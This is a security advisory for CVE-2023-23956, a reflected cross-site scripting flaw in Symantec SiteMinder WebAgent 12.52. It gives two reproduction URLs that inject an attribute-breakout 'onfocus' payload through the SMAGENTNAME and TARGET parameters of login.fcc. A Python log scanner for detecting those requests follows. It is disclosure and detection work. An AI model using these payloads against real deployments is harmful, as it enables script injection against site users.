- Symantec SiteMinder WebAgent 12.52 Cross Site Scripting
- Authored by Harshit Joshi
Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.
- advisories | CVE-2023-23956
- SHA-256 |
1e3c42d3d0c7abf35ae520a6ff70b622c2dce6badcb46b8db94cb2c61004e9d6
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version: 12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
Vulnerability Details:
---------------------
*Impact:*
This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.
*Steps to Reproduce:*
*First:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME* parameter is the source of this vulnerability.
- Payload Used: *-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET* parameter is the source of this vulnerability.
- Payload Used: *-SM-/" onfocus="alert(1)" autofocus="*
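
A defender-side check for the two requests above, as an added example that is not part of the original advisory: it scans web access logs for `login.fcc` requests whose `SMAGENTNAME` or `TARGET` value decodes to attribute-breakout characters or an inline event handler. The combined log format, the sample lines and the function names are assumptions; the encoded value in the second sample line is the one quoted in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameters named in the advisory's reproduction steps.
FCC_PATH = "/siteminderagent/forms/login.fcc"
WATCHED_PARAMS = ("SMAGENTNAME", "TARGET")
# Characters that end a quoted HTML attribute value or open a tag.
BREAKOUT = re.compile(r'["\'<>]')
# Inline event-handler attribute such as onfocus= or onmouseover=.
HANDLER = re.compile(r'(?:^|[\s/"\'])on[a-z]+\s*=', re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log; hosts and values are illustrative, the encoded
# payload is the one quoted in the advisory.
SAMPLE_LOG = [
    '198.51.100.4 - - [18/Jun/2023:10:00:01 +0000] "GET /siteminderagent/forms/login.fcc'
    '?TYPE=123&SMAGENTNAME=-SM-agent1&TARGET=-SM-https%3A%2F%2Fapp.example.test%2Fhome HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Jun/2023:10:02:13 +0000] "GET /siteminderagent/forms/login.fcc'
    '?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22 HTTP/1.1" 200 5304',
    '198.51.100.9 - - [18/Jun/2023:10:03:40 +0000] "GET /search?q=%22quoted%22 HTTP/1.1" 200 812',
]


def suspicious_params(url):
    """Return {param: decoded value} for watched parameters that carry markup."""
    parts = urlsplit(url)
    if parts.path.lower() != FCC_PATH:
        return {}
    hits = {}
    # parse_qs percent-decodes once; double-encoded values are not unwrapped here.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name.upper() in WATCHED_PARAMS and (
                BREAKOUT.search(value) or HANDLER.search(value)
            ):
                hits[name.upper()] = value
    return hits


def scan(log_lines):
    """Return [(line number, hits)] for log lines with a flagged login.fcc request."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            findings.append((number, hits))
    return findings
```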